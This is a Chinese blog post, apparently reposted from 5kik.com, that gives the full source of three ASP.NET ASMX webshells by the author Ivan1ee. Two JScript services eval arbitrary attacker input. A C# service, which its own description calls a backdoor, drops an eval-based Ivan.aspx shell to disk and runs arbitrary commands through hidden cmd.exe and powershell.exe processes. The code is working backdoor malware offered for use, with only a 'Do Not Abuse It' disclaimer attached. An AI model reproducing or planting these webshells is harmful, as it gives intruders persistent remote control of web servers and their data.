.net下asmx一句话服务端两个

接力昨天的ashx一句话http://www.5kik.com/aspnews/646.html,今天放出的是基于webservice实现的一句话,另外还有asmx的小马 一并打包。

<%@ WebService Language="JScript" class="ScriptMethodSpy"%>import System;import System.Web;import System.IO;import System.Web.Servicesimport System.Web.Script.Servicespublic class ScriptMethodSpy extends WebService{WebMethodAttribute ScriptMethodAttribute function Invoke(Ivan : String) : Void{ 
var I = HttpContext.Current;var Request = I.Request;var Response = I.Response;var Server = I.Server;Response.Write("<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>");eval(Ivan);}}
<%@ WebService Language="C#" class="asmxSmallSpy"%>
using System;
using System.IO;
using System.Web;
using System.Web.Services;
using System.Diagnostics;
using System.Collections.Generic;
using System.Web.Script.Serialization;
using System.Web.Script.Services;
[System.Web.Script.Services.ScriptService]
[WebService(Namespace = "http://tempuri.org/" ,Description ="<B>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></B>" , Name ="asmxSmallSpy —— .NET下的又一款优雅的后门")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
public class asmxSmallSpy : System.Web.Services.WebService
    {
        /**
        Code by Ivan [email protected]
        Date: 2018-07-16
        No Pain,No Gain!
        **/
        
        [System.ComponentModel.ToolboxItem(false)]
        [WebMethod]
        /**
        Create A BackDoor
        **/
        public string webShell()
        {
            StreamWriter wickedly = File.CreateText(HttpContext.Current.Server.MapPath("Ivan.aspx"));
            wickedly.Write("<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"Ivan\"],\"unsafe\");%>");
            wickedly.Flush();
            wickedly.Close();
            return "Wickedly";
        }

        [WebMethod]
        /**
        Exec Command via powerShell 
        **/
        public string powerShell(string input)
        {
            Process pr = new Process();
            pr.StartInfo.FileName = "powershell.exe";
            pr.StartInfo.RedirectStandardOutput = true;
            pr.StartInfo.UseShellExecute = false;
            pr.StartInfo.Arguments = "/c " + input;
            pr.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            pr.Start();
            StreamReader osr = pr.StandardOutput;
            String ocmd = osr.ReadToEnd();
            osr.Close();
            osr.Dispose();
            return ocmd;
        }

        
        [WebMethod]
        /**
        Exec Command via cmdShell 
        **/
        public string cmdShell(string input)
        {
            Process pr = new Process();
            pr.StartInfo.FileName = "cmd.exe";
            pr.StartInfo.RedirectStandardOutput = true;
            pr.StartInfo.UseShellExecute = false;
            pr.StartInfo.Arguments = "/c " + input;
            pr.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            pr.Start();
            StreamReader osr = pr.StandardOutput;
            String ocmd = osr.ReadToEnd();
            osr.Close();
            osr.Dispose();
            return ocmd;
        }
    }
<%@ WebService Language="JScript" class="asmxWebMethodSpy"%>import System;import System.Web;import System.IO;import System.Web.Services;public class asmxWebMethodSpy extends WebService{       WebMethodAttribute function Invoke(Ivan : String) : Void{ var c = HttpContext.Current;var Request = c.Request;var Response = c.Response;var Server = c.Server;Response.Write("<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>");eval(Ivan);} }


  原文链接:http://www.5kik.com/aspnews/647.html

相关文章

发表评论:

验证码

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。